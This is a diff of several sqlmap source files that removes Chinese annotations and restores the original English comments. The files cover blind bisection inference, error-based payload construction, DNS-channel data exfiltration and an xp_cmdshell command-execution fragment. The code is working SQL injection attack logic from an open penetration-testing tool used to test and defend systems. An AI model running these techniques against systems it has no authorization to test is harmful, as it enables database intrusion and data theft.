            hashDBWrite(HASHDB_KEYS.KB_XP_CMDSHELL_AVAILABLE, kb.xpCmdshellAvailable)

            if not kb.xpCmdshellAvailable:
-                errMsg = "无法在没有xp_cmdshell的情况下继续"
+                errMsg = "unable to proceed without xp_cmdshell"
                raise SqlmapUnsupportedFeatureException(errMsg)

-        debugMsg = "创建支持表以写入命令标准输出"
+        debugMsg = "creating a support table to write commands standard "
+        debugMsg += "output to"
        logger.debug(debugMsg)

-        # 创建支持表,使用NVARCHAR(4000)而不是TEXT类型
-        # 因为在错误技术中TEXT类型不能比较或排序
+        # TEXT can't be used here because in error technique you get:
+        # "The text, ntext, and image data types cannot be compared or sorted"
        self.createSupportTbl(self.cmdTblName, self.tblField, "NVARCHAR(4000)")

        self._xpCmdshellTest()
--- a/src/sqlmap-master/lib/techniques/blind/inference.py
+++ b/src/sqlmap-master/lib/techniques/blind/inference.py
@ -5,113 +5,92 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入必要的模块
-from __future__ import division  # 使用真除法,避免整数除法的问题
-
-import re  # 正则表达式模块
-import time  # 时间相关操作
-
-# 导入sqlmap自定义模块
-from lib.core.agent import agent  # SQL语句构造和处理
-from lib.core.common import Backend  # 数据库后端相关
-from lib.core.common import calculateDeltaSeconds  # 计算时间差
-from lib.core.common import dataToStdout  # 输出到标准输出
-from lib.core.common import decodeDbmsHexValue  # 解码数据库十六进制值
-from lib.core.common import decodeIntToUnicode  # 整数转Unicode字符
-from lib.core.common import filterControlChars  # 过滤控制字符
-from lib.core.common import getCharset  # 获取字符集
-from lib.core.common import getCounter  # 获取计数器
-from lib.core.common import getPartRun  # 获取部分运行信息
-from lib.core.common import getTechnique  # 获取注入技术
-from lib.core.common import getTechniqueData  # 获取注入技术数据
-from lib.core.common import goGoodSamaritan  # 智能预测功能
-from lib.core.common import hashDBRetrieve  # 从哈希数据库读取
-from lib.core.common import hashDBWrite  # 写入哈希数据库
-from lib.core.common import incrementCounter  # 增加计数器
-from lib.core.common import isDigit  # 判断是否为数字
-from lib.core.common import isListLike  # 判断是否为列表类型
-from lib.core.common import safeStringFormat  # 安全的字符串格式化
-from lib.core.common import singleTimeWarnMessage  # 单次警告消息
-from lib.core.data import conf  # 配置信息
-from lib.core.data import kb  # 知识库
-from lib.core.data import logger  # 日志记录
-from lib.core.data import queries  # SQL查询语句
-from lib.core.enums import ADJUST_TIME_DELAY  # 时间延迟调整枚举
-from lib.core.enums import CHARSET_TYPE  # 字符集类型枚举
-from lib.core.enums import DBMS  # 数据库类型枚举
-from lib.core.enums import PAYLOAD  # Payload类型枚举
-from lib.core.exception import SqlmapThreadException  # 线程异常
-from lib.core.exception import SqlmapUnsupportedFeatureException  # 不支持特性异常
-from lib.core.settings import CHAR_INFERENCE_MARK  # 字符推断标记
-from lib.core.settings import INFERENCE_BLANK_BREAK  # 空白中断标记
-from lib.core.settings import INFERENCE_EQUALS_CHAR  # 等于字符标记
-from lib.core.settings import INFERENCE_GREATER_CHAR  # 大于字符标记
-from lib.core.settings import INFERENCE_MARKER  # 推断标记
-from lib.core.settings import INFERENCE_NOT_EQUALS_CHAR  # 不等于字符标记
-from lib.core.settings import INFERENCE_UNKNOWN_CHAR  # 未知字符标记
-from lib.core.settings import MAX_BISECTION_LENGTH  # 最大二分长度
-from lib.core.settings import MAX_REVALIDATION_STEPS  # 最大重新验证步骤
-from lib.core.settings import NULL  # 空值
-from lib.core.settings import PARTIAL_HEX_VALUE_MARKER  # 部分十六进制值标记
-from lib.core.settings import PARTIAL_VALUE_MARKER  # 部分值标记
-from lib.core.settings import PAYLOAD_DELIMITER  # Payload分隔符
-from lib.core.settings import RANDOM_INTEGER_MARKER  # 随机整数标记
-from lib.core.settings import VALID_TIME_CHARS_RUN_THRESHOLD  # 有效时间字符运行阈值
-from lib.core.threads import getCurrentThreadData  # 获取当前线程数据
-from lib.core.threads import runThreads  # 运行线程
-from lib.core.unescaper import unescaper  # 反转义处理
-from lib.request.connect import Connect as Request  # HTTP请求处理
-from lib.utils.progress import ProgressBar  # 进度条
-from lib.utils.safe2bin import safecharencode  # 安全字符编码
-from lib.utils.xrange import xrange  # 兼容Python2/3的range
-from thirdparty import six  # Python 2/3兼容库
+from __future__ import division
+
+import re
+import time
+
+from lib.core.agent import agent
+from lib.core.common import Backend
+from lib.core.common import calculateDeltaSeconds
+from lib.core.common import dataToStdout
+from lib.core.common import decodeDbmsHexValue
+from lib.core.common import decodeIntToUnicode
+from lib.core.common import filterControlChars
+from lib.core.common import getCharset
+from lib.core.common import getCounter
+from lib.core.common import getPartRun
+from lib.core.common import getTechnique
+from lib.core.common import getTechniqueData
+from lib.core.common import goGoodSamaritan
+from lib.core.common import hashDBRetrieve
+from lib.core.common import hashDBWrite
+from lib.core.common import incrementCounter
+from lib.core.common import isDigit
+from lib.core.common import isListLike
+from lib.core.common import safeStringFormat
+from lib.core.common import singleTimeWarnMessage
+from lib.core.data import conf
+from lib.core.data import kb
+from lib.core.data import logger
+from lib.core.data import queries
+from lib.core.enums import ADJUST_TIME_DELAY
+from lib.core.enums import CHARSET_TYPE
+from lib.core.enums import DBMS
+from lib.core.enums import PAYLOAD
+from lib.core.exception import SqlmapThreadException
+from lib.core.exception import SqlmapUnsupportedFeatureException
+from lib.core.settings import CHAR_INFERENCE_MARK
+from lib.core.settings import INFERENCE_BLANK_BREAK
+from lib.core.settings import INFERENCE_EQUALS_CHAR
+from lib.core.settings import INFERENCE_GREATER_CHAR
+from lib.core.settings import INFERENCE_MARKER
+from lib.core.settings import INFERENCE_NOT_EQUALS_CHAR
+from lib.core.settings import INFERENCE_UNKNOWN_CHAR
+from lib.core.settings import MAX_BISECTION_LENGTH
+from lib.core.settings import MAX_REVALIDATION_STEPS
+from lib.core.settings import NULL
+from lib.core.settings import PARTIAL_HEX_VALUE_MARKER
+from lib.core.settings import PARTIAL_VALUE_MARKER
+from lib.core.settings import PAYLOAD_DELIMITER
+from lib.core.settings import RANDOM_INTEGER_MARKER
+from lib.core.settings import VALID_TIME_CHARS_RUN_THRESHOLD
+from lib.core.threads import getCurrentThreadData
+from lib.core.threads import runThreads
+from lib.core.unescaper import unescaper
+from lib.request.connect import Connect as Request
+from lib.utils.progress import ProgressBar
+from lib.utils.safe2bin import safecharencode
+from lib.utils.xrange import xrange
+from thirdparty import six

 def bisection(payload, expression, length=None, charsetType=None, firstChar=None, lastChar=None, dump=False):
    """
-    二分法算法,用于执行盲注SQL注入
-    
-    参数说明:
-    payload - SQL注入的payload模板
-    expression - 需要注入的SQL表达式
-    length - 查询结果的长度限制
-    charsetType - 字符集类型
-    firstChar - 起始字符位置
-    lastChar - 结束字符位置
-    dump - 是否导出数据
+    Bisection algorithm that can be used to perform blind SQL injection
+    on an affected host
    """

-    # 初始化变量
-    abortedFlag = False  # 中止标志
-    showEta = False     # 是否显示进度条
-    partialValue = u""  # 部分结果值
-    finalValue = None   # 最终结果值
-    retrievedLength = 0 # 已获取的长度
+    abortedFlag = False
+    showEta = False
+    partialValue = u""
+    finalValue = None
+    retrievedLength = 0

-    # 检查payload是否为空
    if payload is None:
        return 0, None

-    # 根据字符集类型获取ASCII表
    if charsetType is None and conf.charset:
        asciiTbl = sorted(set(ord(_) for _ in conf.charset))
    else:
        asciiTbl = getCharset(charsetType)

-    # 获取当前线程数据
    threadData = getCurrentThreadData()
-    
-    # 判断是否为基于时间的注入
    timeBasedCompare = (getTechnique() in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED))
-    
-    # 从缓存中获取已有结果
    retVal = hashDBRetrieve(expression, checkConf=True)

-    # 如果有缓存结果
    if retVal:
-        # 如果需要修复且结果中包含未知字符
        if conf.repair and INFERENCE_UNKNOWN_CHAR in retVal:
            pass
-        # 如果结果中包含部分十六进制值标记
        elif PARTIAL_HEX_VALUE_MARKER in retVal:
            retVal = retVal.replace(PARTIAL_HEX_VALUE_MARKER, "")

@ -119,7 +98,6 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
                partialValue = retVal
                infoMsg = "resuming partial value: %s" % safecharencode(partialValue)
                logger.info(infoMsg)
-        # 如果结果中包含部分值标记
        elif PARTIAL_VALUE_MARKER in retVal:
            retVal = retVal.replace(PARTIAL_VALUE_MARKER, "")

@ -127,15 +105,13 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
                partialValue = retVal
                infoMsg = "resuming partial value: %s" % safecharencode(partialValue)
                logger.info(infoMsg)
-        # 其他情况直接使用缓存结果
        else:
            infoMsg = "resumed: %s" % safecharencode(retVal)
            logger.info(infoMsg)

            return 0, retVal

-    # 针对不同数据库的特殊处理
-    if Backend.isDbms(DBMS.MCKOI):  # McKoi数据库
+    if Backend.isDbms(DBMS.MCKOI):
        match = re.search(r"\ASELECT\b(.+)\bFROM\b(.+)\Z", expression, re.I)
        if match:
            original = queries[Backend.getIdentifiedDbms()].inference.query
@ -143,7 +119,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
            payload = payload.replace(right, "(SELECT %s FROM %s)" % (right, match.group(2).strip()))
            expression = match.group(1).strip()

-    elif Backend.isDbms(DBMS.FRONTBASE):  # FrontBase数据库
+    elif Backend.isDbms(DBMS.FRONTBASE):
        match = re.search(r"\ASELECT\b(\s+TOP\s*\([^)]+\)\s+)?(.+)\bFROM\b(.+)\Z", expression, re.I)
        if match:
            payload = payload.replace(INFERENCE_GREATER_CHAR, " FROM %s)%s" % (match.group(3).strip(), INFERENCE_GREATER_CHAR))
@ -151,18 +127,17 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
            expression = match.group(2).strip()

    try:
-        # 设置kb.partRun用于"common prediction"特性或API调用
-        if conf.predictOutput:  # 如果启用了预测输出
+        # Set kb.partRun in case "common prediction" feature (a.k.a. "good samaritan") is used or the engine is called from the API
+        if conf.predictOutput:
            kb.partRun = getPartRun()
-        elif conf.api:  # 如果是API调用
+        elif conf.api:
            kb.partRun = getPartRun(alias=False)
        else:
            kb.partRun = None

-        # 设置起始字符位置
-        if partialValue:  # 如果有部分值,从部分值长度开始
+        if partialValue:
            firstChar = len(partialValue)
-        elif re.search(r"(?i)(\b|CHAR_)(LENGTH|LEN|COUNT)\(", expression):  # 如果是长度查询,从0开始
+        elif re.search(r"(?i)(\b|CHAR_)(LENGTH|LEN|COUNT)\(", expression):
            firstChar = 0
        elif conf.firstChar is not None and (isinstance(conf.firstChar, int) or (hasattr(conf.firstChar, "isdigit") and conf.firstChar.isdigit())):
            firstChar = int(conf.firstChar) - 1
@ -173,8 +148,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
        else:
            firstChar = 0

-        # 设置结束字符位置
-        if re.search(r"(?i)(\b|CHAR_)(LENGTH|LEN|COUNT)\(", expression):  # 如果是长度查询,结束位置为0
+        if re.search(r"(?i)(\b|CHAR_)(LENGTH|LEN|COUNT)\(", expression):
            lastChar = 0
        elif conf.lastChar is not None and (isinstance(conf.lastChar, int) or (hasattr(conf.lastChar, "isdigit") and conf.lastChar.isdigit())):
            lastChar = int(conf.lastChar)
@ -183,7 +157,6 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
        else:
            lastChar = 0

-        # 处理数据库相关的字段转换
        if Backend.getDbms():
            _, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression)
            nulledCastedField = agent.nullAndCastField(fieldToCastStr)
@ -192,7 +165,6 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
        else:
            expressionUnescaped = unescaper.escape(expression)

-        # 处理长度参数
        if isinstance(length, six.string_types) and isDigit(length) or isinstance(length, int):
            length = int(length)
        else:
@ -207,11 +179,9 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
        if length and length > MAX_BISECTION_LENGTH:
            length = None

-        # 是否显示进度条
        showEta = conf.eta and isinstance(length, int)

-        # 设置线程数
-        if kb.bruteMode:  # 暴力模式只用1个线程
+        if kb.bruteMode:
            numThreads = 1
        else:
            numThreads = min(conf.threads or 0, length or 0) or 1
@ -219,7 +189,6 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
        if showEta:
            progress = ProgressBar(maxValue=length)

-        # 多线程处理
        if numThreads > 1:
            if not timeBasedCompare or kb.forceThreads:
                debugMsg = "starting %d thread%s" % (numThreads, ("s" if numThreads > 1 else ""))
@ -227,13 +196,11 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
            else:
                numThreads = 1

-        # 单线程模式提示
        if conf.threads == 1 and not any((timeBasedCompare, conf.predictOutput)):
            warnMsg = "running in a single-thread mode. Please consider "
            warnMsg += "usage of option '--threads' for faster data retrieval"
            singleTimeWarnMessage(warnMsg)

-        # 显示进度信息
        if conf.verbose in (1, 2) and not any((showEta, conf.api, kb.bruteMode)):
            if isinstance(length, int) and numThreads > 1:
                dataToStdout("[%s] [INFO] retrieved: %s" % (time.strftime("%X"), "_" * min(length, conf.progressWidth)))
@ -242,12 +209,6 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
                dataToStdout("\r[%s] [INFO] retrieved: " % time.strftime("%X"))

        def tryHint(idx):
-            """
-            尝试使用提示值进行查询
-            
-            参数:
-            idx - 当前字符位置
-            """
            with kb.locks.hint:
                hintValue = kb.hintValue

@ -274,17 +235,15 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None

        def validateChar(idx, value):
            """
-            验证字符值是否正确
-            
-            参数:
-            idx - 字符位置
-            value - 字符值
+            Used in inference - in time-based SQLi if original and retrieved value are not equal there will be a deliberate delay
            """
+
            validationPayload = re.sub(r"(%s.*?)%s(.*?%s)" % (PAYLOAD_DELIMITER, INFERENCE_GREATER_CHAR, PAYLOAD_DELIMITER), r"\g<1>%s\g<2>" % INFERENCE_NOT_EQUALS_CHAR, payload)

            if "'%s'" % CHAR_INFERENCE_MARK not in payload:
                forgedPayload = safeStringFormat(validationPayload, (expressionUnescaped, idx, value))
            else:
+                # e.g.: ... > '%c' -> ... > ORD(..)
                markingValue = "'%s'" % CHAR_INFERENCE_MARK
                unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(value))
                forgedPayload = safeStringFormat(validationPayload, (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue)
@ -303,16 +262,10 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None

        def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, shiftTable=None, retried=None):
            """
-            获取指定位置的字符
-            
-            参数:
-            idx - 字符位置
-            charTbl - 字符表
-            continuousOrder - 是否连续顺序
-            expand - 是否扩展字符集
-            shiftTable - 位移表
-            retried - 重试次数
+            continuousOrder means that distance between each two neighbour's
+            numerical values is exactly 1
            """
+
            result = tryHint(idx)

            if result:
@ -326,6 +279,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
            if kb.disableShiftTable:
                shiftTable = None
            elif continuousOrder and shiftTable is None:
+                # Used for gradual expanding into unicode charspace
                shiftTable = [2, 2, 3, 3, 3]

            if "'%s'" % CHAR_INFERENCE_MARK in payload:
@ -378,6 +332,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
                        elif not lastCheck and numThreads == 1:  # not usable in multi-threading environment
                            if charTbl[(len(charTbl) >> 1)] < ord(' '):
                                try:
+                                    # favorize last char check if current value inclines toward 0
                                    position = charTbl.index(1)
                                except ValueError:
                                    pass
@ -394,6 +349,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
                        forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue))
                        falsePayload = safeStringFormat(payload, (expressionUnescaped, idx, RANDOM_INTEGER_MARKER))
                    else:
+                        # e.g.: ... > '%c' -> ... > ORD(..)
                        markingValue = "'%s'" % CHAR_INFERENCE_MARK
                        unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(posValue))
                        forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue)
@ -427,6 +383,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
                        if not isinstance(charTbl, xrange):
                            charTbl = charTbl[position:]
                        else:
+                            # xrange() - extended virtual charset used for memory/space optimization
                            charTbl = xrange(charTbl[position], charTbl[-1] + 1)
                    else:
                        maxValue = posValue
@ -440,7 +397,13 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
                        if maxValue == 1:
                            return None

+                        # Going beyond the original charset
                        elif minValue == maxChar:
+                            # If the original charTbl was [0,..,127] new one
+                            # will be [128,..,(128 << 4) - 1] or from 128 to 2047
+                            # and instead of making a HUGE list with all the
+                            # elements we use a xrange, which is a virtual
+                            # list
                            if expand and shiftTable:
                                charTbl = xrange(maxChar + 1, (maxChar + 1) << shiftTable.pop())
                                originalTbl = xrange(charTbl)
@ -529,17 +492,14 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
                    if result:
                        return decodeIntToUnicode(candidates[0])

-        # 多线程处理(--threads > 1)
+        # Go multi-threading (--threads > 1)
        if numThreads > 1 and isinstance(length, int) and length > 1:
            threadData.shared.value = [None] * length
-            threadData.shared.index = [firstChar]    # 作为列表用于python嵌套函数作用域
+            threadData.shared.index = [firstChar]    # As list for python nested function scoping
            threadData.shared.start = firstChar

            try:
                def blindThread():
-                    """
-                    盲注线程函数
-                    """
                    threadData = getCurrentThreadData()

                    while kb.threadContinue:
@ -557,7 +517,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
                        else:
                            break

-                        # 注意: https://github.com/sqlmapproject/sqlmap/issues/4629
+                        # NOTE: https://github.com/sqlmapproject/sqlmap/issues/4629
                        if not isListLike(threadData.shared.value):
                            break

@ -614,7 +574,8 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None

            infoMsg = None

-            # 如果有一个字符没有正确获取,可能意味着与目标URL的连接丢失
+            # If we have got one single character not correctly fetched it
+            # can mean that the connection to the target URL was lost
            if None in value:
                partialValue = "".join(value[:value.index(None)])

@ -627,7 +588,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
            if conf.verbose in (1, 2) and infoMsg and not any((showEta, conf.api, kb.bruteMode)):
                dataToStdout(infoMsg)

-        # 单线程处理(--threads = 1)
+        # No multi-threading (--threads = 1)
        else:
            index = firstChar
            threadData.shared.value = ""
@ -635,15 +596,17 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
            while True:
                index += 1

-                # 常见预测功能(又名"good samaritan")
-                # 注意:目前仅在未设置多线程时使用
+                # Common prediction feature (a.k.a. "good samaritan")
+                # NOTE: to be used only when multi-threading is not set for
+                # the moment
                if conf.predictOutput and len(partialValue) > 0 and kb.partRun is not None:
                    val = None
                    commonValue, commonPattern, commonCharset, otherCharset = goGoodSamaritan(partialValue, asciiTbl)

-                    # 如果common-outputs中有一个单一输出,通过等于查询输出进行检查
+                    # If there is one single output in common-outputs, check
+                    # it via equal against the query output
                    if commonValue is not None:
-                        # 一次性查询包含等于commonValue
+                        # One-shot query containing equals commonValue
                        testValue = unescaper.escape("'%s'" % commonValue) if "'" not in commonValue else unescaper.escape("%s" % commonValue, quote=False)

                        query = getTechniqueData().vector
@ -653,7 +616,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
                        result = Request.queryPage(agent.payload(newValue=query), timeBasedCompare=timeBasedCompare, raise404=False)
                        incrementCounter(getTechnique())

-                        # 是否成功?
+                        # Did we have luck?
                        if result:
                            if showEta:
                                progress.progress(len(commonValue))
--- a/src/sqlmap-master/lib/techniques/dns/test.py
+++ b/src/sqlmap-master/lib/techniques/dns/test.py
@ -5,7 +5,6 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入Backend、randomInt、conf、kb、logger、FROM_DUMMY_TABLE、SqlmapNotVulnerableException、dnsUse模块
 from lib.core.common import Backend
 from lib.core.common import randomInt
 from lib.core.data import conf
@ -15,31 +14,19 @@ from lib.core.dicts import FROM_DUMMY_TABLE
 from lib.core.exception import SqlmapNotVulnerableException
 from lib.techniques.dns.use import dnsUse

-# 定义dnsTest函数，用于测试通过DNS通道获取数据
-    # 打印日志，表示正在测试通过DNS通道获取数据
-    # 打印信息，表示正在测试通过DNS通道获取数据
 def dnsTest(payload):
    logger.info("testing for data retrieval through DNS channel")
-    # 生成一个随机整数

-    # 将kb.dnsTest设置为通过dnsUse函数获取的数据是否等于randInt
    randInt = randomInt()
    kb.dnsTest = dnsUse(payload, "SELECT %d%s" % (randInt, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""))) == str(randInt)
-    # 如果kb.dnsTest为False，表示通过DNS通道获取数据失败

-        # 构造错误信息
    if not kb.dnsTest:
-        # 如果没有强制使用DNS通道
        errMsg = "data retrieval through DNS channel failed"
-            # 将conf.dnsDomain设置为None
        if not conf.forceDns:
-            # 构造错误信息
            conf.dnsDomain = None
            errMsg += ". Turning off DNS exfiltration support"
            logger.error(errMsg)
-        # 如果强制使用DNS通道
        else:
-            # 抛出SqlmapNotVulnerableException异常
            raise SqlmapNotVulnerableException(errMsg)
    else:
        infoMsg = "data retrieval through DNS channel was successful"
--- a/src/sqlmap-master/lib/techniques/dns/use.py
+++ b/src/sqlmap-master/lib/techniques/dns/use.py
@ -46,12 +46,9 @@ def dnsUse(payload, expression):
    count = 0
    offset = 1

-    # 如果配置了dnsDomain，并且数据库类型为MSSQL、ORACLE、MYSQL、PGSQL
    if conf.dnsDomain and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE, DBMS.MYSQL, DBMS.PGSQL):
-        # 使用hashDBRetrieve函数获取SQL查询的输出
        output = hashDBRetrieve(expression, checkConf=True)

-        # 如果输出中包含PARTIAL_VALUE_MARKER，或者kb.dnsTest为None，则将输出置为None
        if output and PARTIAL_VALUE_MARKER in output or kb.dnsTest is None:
            output = None

@ -101,15 +98,10 @@ def dnsUse(payload, expression):

            kb.dnsMode = False

-        # 如果output不为None
-        # 如果output不为None
        if output is not None:
-            # 将output赋值给retVal
            retVal = output

-            # 如果kb.dnsTest不为None
            if kb.dnsTest is not None:
-                # 将output输出到标准输出
                dataToStdout("[%s] [INFO] %s: %s\n" % (time.strftime("%X"), "retrieved" if count > 0 else "resumed", safecharencode(output)))

                if count > 0:
--- a/src/sqlmap-master/lib/techniques/error/use.py
+++ b/src/sqlmap-master/lib/techniques/error/use.py
@ -5,7 +5,6 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
 See the file 'LICENSE' for copying permission
 """

-# 导入需要的模块
 from __future__ import print_function

 import re
@ -64,127 +63,98 @@ from lib.utils.safe2bin import safecharencode
 from thirdparty import six

 def _oneShotErrorUse(expression, field=None, chunkTest=False):
-    """
-    执行单次基于错误的SQL注入查询
-    
-    参数:
-    expression - 要执行的SQL表达式
-    field - 要查询的字段名(可选)
-    chunkTest - 是否为分块测试模式(用于确定最佳查询长度)
-    
-    返回:
-    查询结果
-    """
-    
-    # 初始化变量
-    offset = 1  # 结果偏移量,用于分块获取数据
-    rotator = 0  # 旋转字符索引,用于显示进度
-    partialValue = None  # 存储部分查询结果
-    threadData = getCurrentThreadData()  # 获取当前线程数据
-    retVal = hashDBRetrieve(expression, checkConf=True)  # 尝试从缓存中获取结果
-
-    # 如果缓存的结果包含部分值标记,则提取部分值
+    offset = 1
+    rotator = 0
+    partialValue = None
+    threadData = getCurrentThreadData()
+    retVal = hashDBRetrieve(expression, checkConf=True)
+
    if retVal and PARTIAL_VALUE_MARKER in retVal:
        partialValue = retVal = retVal.replace(PARTIAL_VALUE_MARKER, "")
        logger.info("resuming partial value: '%s'" % _formatPartialContent(partialValue))
-        offset += len(partialValue)  # 调整偏移量继续获取剩余数据
+        offset += len(partialValue)

-    # 标记是否从缓存恢复数据
    threadData.resumed = retVal is not None and not partialValue

-    # 对特定数据库进行错误分块长度检测
-    # 这是为了找到最佳的查询长度,避免数据库截断结果
    if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL, DBMS.SYBASE, DBMS.ORACLE)) and kb.errorChunkLength is None and not chunkTest and not kb.testMode:
        debugMsg = "searching for error chunk length..."
        logger.debug(debugMsg)

-        seen = set()  # 记录已测试过的长度
-        current = MAX_ERROR_CHUNK_LENGTH  # 从最大长度开始测试
-        
-        # 二分查找最佳长度
+        seen = set()
+        current = MAX_ERROR_CHUNK_LENGTH
        while current >= MIN_ERROR_CHUNK_LENGTH:
-            testChar = str(current % 10)  # 测试字符
+            testChar = str(current % 10)

-            # 根据不同数据库构造测试查询
            if Backend.isDbms(DBMS.ORACLE):
                testQuery = "RPAD('%s',%d,'%s')" % (testChar, current, testChar)
            else:
                testQuery = "%s('%s',%d)" % ("REPEAT" if Backend.isDbms(DBMS.MYSQL) else "REPLICATE", testChar, current)
                testQuery = "SELECT %s" % (agent.hexConvertField(testQuery) if conf.hexConvert else testQuery)

-            # 执行测试查询
            result = unArrayizeValue(_oneShotErrorUse(testQuery, chunkTest=True))
            seen.add(current)

-            # 分析测试结果确定分块长度
            if (result or "").startswith(testChar):
                if result == testChar * current:
-                    kb.errorChunkLength = current  # 找到合适的长度
+                    kb.errorChunkLength = current
                    break
                else:
                    result = re.search(r"\A\w+", result).group(0)
                    candidate = len(result) - len(kb.chars.stop)
                    current = candidate if candidate != current and candidate not in seen else current - 1
            else:
-                current = current // 2  # 二分缩小范围
+                current = current // 2

-        # 保存找到的分块长度
        if kb.errorChunkLength:
            hashDBWrite(HASHDB_KEYS.KB_ERROR_CHUNK_LENGTH, kb.errorChunkLength)
        else:
            kb.errorChunkLength = 0

-    # 如果没有缓存结果或者有部分值,执行实际查询
    if retVal is None or partialValue:
        try:
            while True:
-                # 定义用于提取结果的正则表达式
-                check = r"(?si)%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop)  # 完整结果匹配
-                trimCheck = r"(?si)%s(?P<result>[^<\n]*)" % kb.chars.start  # 截断结果匹配
+                check = r"(?si)%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop)
+                trimCheck = r"(?si)%s(?P<result>[^<\n]*)" % kb.chars.start

-                # 处理字段转换
                if field:
-                    nulledCastedField = agent.nullAndCastField(field)  # 转换字段格式
+                    nulledCastedField = agent.nullAndCastField(field)

-                    # 对特定数据库进行分块处理
                    if any(Backend.isDbms(dbms) for dbms in (DBMS.MYSQL, DBMS.MSSQL, DBMS.SYBASE, DBMS.ORACLE)) and not any(_ in field for _ in ("COUNT", "CASE")) and kb.errorChunkLength and not chunkTest:
                        extendedField = re.search(r"[^ ,]*%s[^ ,]*" % re.escape(field), expression).group(0)
-                        if extendedField != field:  # 处理聚合函数,如MIN(surname)
+                        if extendedField != field:  # e.g. MIN(surname)
                            nulledCastedField = extendedField.replace(field, nulledCastedField)
                            field = extendedField
                        nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, kb.errorChunkLength)

-                # 构造注入payload
-                vector = getTechniqueData().vector  # 获取注入向量
-                query = agent.prefixQuery(vector)  # 添加前缀
-                query = agent.suffixQuery(query)  # 添加后缀
-                injExpression = expression.replace(field, nulledCastedField, 1) if field else expression  # 替换字段
-                injExpression = unescaper.escape(injExpression)  # 转义特殊字符
-                injExpression = query.replace("[QUERY]", injExpression)  # 构造最终查询
-                payload = agent.payload(newValue=injExpression)  # 生成payload
+                # Forge the error-based SQL injection request
+                vector = getTechniqueData().vector
+                query = agent.prefixQuery(vector)
+                query = agent.suffixQuery(query)
+                injExpression = expression.replace(field, nulledCastedField, 1) if field else expression
+                injExpression = unescaper.escape(injExpression)
+                injExpression = query.replace("[QUERY]", injExpression)
+                payload = agent.payload(newValue=injExpression)

-                # 发送HTTP请求
+                # Perform the request
                page, headers, _ = Request.queryPage(payload, content=True, raise404=False)

-                incrementCounter(getTechnique())  # 增加计数器
+                incrementCounter(getTechnique())

-                # 处理特殊字符转义
                if page and conf.noEscape:
                    page = re.sub(r"('|\%%27)%s('|\%%27).*?('|\%%27)%s('|\%%27)" % (kb.chars.start, kb.chars.stop), "", page)

-                # 从返回内容中提取结果
+                # Parse the returned page to get the exact error-based
+                # SQL injection output
                output = firstNotNone(
-                    extractRegexResult(check, page),  # 从页面内容提取
-                    extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None),  # 从错误信息提取
-                    extractRegexResult(check, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)),  # 从响应头提取
-                    extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)  # 从重定向信息提取
+                    extractRegexResult(check, page),
+                    extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None),
+                    extractRegexResult(check, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)),
+                    extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None)
                )

-                # 处理输出结果
                if output is not None:
-                    output = getUnicode(output)  # 转换为Unicode
+                    output = getUnicode(output)
                else:
-                    # 处理被截断的结果
                    trimmed = firstNotNone(
                        extractRegexResult(trimCheck, page),
                        extractRegexResult(trimCheck, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None),
@ -193,14 +163,12 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
                    )

                    if trimmed:
-                        # 警告可能的结果截断
                        if not chunkTest:
                            warnMsg = "possible server trimmed output detected "
                            warnMsg += "(due to its length and/or content): "
                            warnMsg += safecharencode(trimmed)
                            logger.warning(warnMsg)

-                        # 尝试提取部分结果
